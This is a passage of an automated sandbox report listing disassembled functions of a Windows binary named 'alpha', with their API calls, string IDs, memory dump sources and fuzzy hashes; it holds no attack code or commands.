                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB1934FA
                                                • Part of subcall function 00007FF6EB1836EC: _get_osfhandle.MSVCRT ref: 00007FF6EB183715
                                                • Part of subcall function 00007FF6EB1836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB183770
                                                • Part of subcall function 00007FF6EB1836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB183791
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                              • String ID:
                                              • API String ID: 1356649289-0
                                              • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                              • Instruction ID: 025797300da41e52b255f845c3479cecd4e98ec701baa0ceef90b22512e442ca
                                              • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                              • Instruction Fuzzy Hash: 74917033A0864297E6149F25F5043B9B6A1FB8EBA8F544135DA4E837B4DF3EE444CB09
                                              Function 00007FF6EB1986FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: LocalTime$ErrorLast_get_osfhandle
                                              • String ID: %s$/-.$:
                                              • API String ID: 1644023181-879152773
                                              • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                              • Instruction ID: 623062c682240c52717e7163109dea228bfc3fdab39ca7f16fb536e340e7d60a
                                              • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                              • Instruction Fuzzy Hash: 9891A123A1868295EB169B24D4403FA62B0FF88BE8F544136DA4EC36F4DF3EE545C716
                                              Function 00007FF6EB19627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB197251), ref: 00007FF6EB19628E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ObjectSingleWait
                                              • String ID: wil
                                              • API String ID: 24740636-1589926490
                                              • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                              • Instruction ID: dd63e7e43eb7bbc65fad40cfe496e355d5b8fec6f4dcc69cce32f3716d05a497
                                              • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                              • Instruction Fuzzy Hash: 14416523A0858283F7604B55E5403FD76A1EF897E9F608131D90DC66E8CF3EE649CB16
                                              Function 00007FF6EB19CDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                              • String ID: $Application$System
                                              • API String ID: 3377411628-1881496484
                                              • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                              • Instruction ID: 957de4751ade5263892d29ccecac40bd479dc6475024747eadde3c126749b463
                                              • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                              • Instruction Fuzzy Hash: 51413833B04B429AE7108B60E4403ED77A5FB8D758F445135DA4E82BA8EF39E149C745
                                              Function 00007FF6EB1714E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                              • String ID: :$\
                                              • API String ID: 3961617410-1166558509
                                              • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                              • Instruction ID: 013a2b510f4e1a1cd9f999fca9265c15e42033a515d752337a67516eb43014be
                                              • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                              • Instruction Fuzzy Hash: A7216023A0864286EB544B60A5442F9A6A1FB4FBACF448131D91FC37B0DF7DE4498A06
                                              Function 00007FF6EB177AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryDriveFullNamePathTypememset
                                              • String ID:
                                              • API String ID: 1397130798-0
                                              • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                              • Instruction ID: b9f3517ef87311d57dcdab519783dd75ac70c5fbe45a5c8dc241fa6b497d1f55
                                              • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                              • Instruction Fuzzy Hash: E191B223B18B8286EB658B10E5403F973A1FF4DBA8F448135DA4E837A4DF7EE5448706
                                              Function 00007FF6EB18258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806D6
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806F0
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB18074D
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB180762
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB1825CA
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB1825E8
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB18260F
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB182636
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB182650
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmp$Heap$AllocProcess
                                              • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                              • API String ID: 3407644289-1668778490
                                              • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                              • Instruction ID: b5ffcbe2f9cf001ab0ca74e0a57494bec69902bde9a2706d14a2882806b1d76d
                                              • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                              • Instruction Fuzzy Hash: 99313A23A0C54286F7125B21E8113F96A95BF8DBA8F548035DA0EC62F5DF3EE404CB4B
                                              Function 00007FF6EB1A0C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                              • String ID: &()[]{}^=;!%'+,`~
                                              • API String ID: 2516562204-381716982
                                              • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                              • Instruction ID: ba21f98d1b1ca0d6dd683a174fe03297bbbc71cd6dea17cfb0a1d73ae9ba05e4
                                              • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                              • Instruction Fuzzy Hash: 84C1BE33A0469286E7508F25E9403BE77A0FB49BA8F441139DE8D93BA8DF3DE454CB05
                                              Function 00007FF6EB187E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • iswspace.MSVCRT ref: 00007FF6EB187EEE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heapiswspace$AllocProcess
                                              • String ID: A
                                              • API String ID: 3731854180-3554254475
                                              • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                              • Instruction ID: 3e64b7d268062f17e8a3513578c8dad3033edca4db52bc3582662c4c6825f66b
                                              • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                              • Instruction Fuzzy Hash: D0A17E23909682C5E7609B11A5543B9B6A0FF4D7B8F048039DA5DC77B8DF3EE445CB0A
                                              Function 00007FF6EB19A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                              • String ID: NTDLL.DLL$NtQueryInformationProcess
                                              • API String ID: 1580871199-2613899276
                                              • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                              • Instruction ID: cd36b768485b0d75adb9a13a70e9a23a1ecef2e1ee26173eb939aa9145c2887b
                                              • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                              • Instruction Fuzzy Hash: 19519373B18B8282EB108B15E4003B977A4FB8DBA8F455135DA9E87764DF3DE005CB49
                                              Function 00007FF6EB177420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                              • String ID: con
                                              • API String ID: 689241570-4257191772
                                              • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                              • Instruction ID: 39ff8e860046c3766f47e4fd9c6ad0411eae20ae508e679ef14fe52adcd046fe
                                              • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                              • Instruction Fuzzy Hash: 1D41A433A0875586E2108F15E5443B9BAA1F74EBB8F644334DA2E833E4CF7ED8498745
                                              Function 00007FF6EB19A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                              • String ID: PE
                                              • API String ID: 2941894976-4258593460
                                              • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                              • Instruction ID: ffe8455601ffe07f90dd8d51147c5a88c32cd90e42799b0c7509a256fad3d700
                                              • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                              • Instruction Fuzzy Hash: 7741A63361869187E7208B11E4103B9B7A0FB8DBA8F445230DE5D83BA5DF3EE449CB45
                                              Function 00007FF6EB180010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6EB19849D,?,?,?,00007FF6EB19F0C7), ref: 00007FF6EB180045
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6EB19F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB180071
                                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB180092
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB1800A7
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB180148
                                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB180181
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                              • String ID:
                                              • API String ID: 734197835-0
                                              • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                              • Instruction ID: ebec78334bb4ae26ad7d30053ea9a1717ac2bbd8fa564d4a543d86f94470a48a
                                              • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                              • Instruction Fuzzy Hash: B8619433A0C697C6E7218B11A8443B97A91BB4DB7CF448139D94D837A4DF3EE445CB0A
                                              Function 00007FF6EB199B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Enum$Openwcsrchr
                                              • String ID: %s=%s$.$\Shell\Open\Command
                                              • API String ID: 3402383852-1459555574
                                              • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                              • Instruction ID: 72113d04e8e9e677c66940c7104ab2497c1240d515c8bea0ecd3d9e8b0819a04
                                              • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                              • Instruction Fuzzy Hash: EFA1D633A0868282EA119B55E4503FA62A0FF8DBF8F444131DA5D877E4DF7EE945C30A
                                              Function 00007FF6EB187610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$wcscmp
                                              • String ID: %s
                                              • API String ID: 243296809-3043279178
                                              • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                              • Instruction ID: d936725bc883c482b7809eab5acffe5a8738c78cdfd95827475e1e06c6f43aff
                                              • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                              • Instruction Fuzzy Hash: 1EA17A23A09B8696EB61DB21D8453F923A0FB4D76CF104035DB4D8B6A9EF3DE644C306
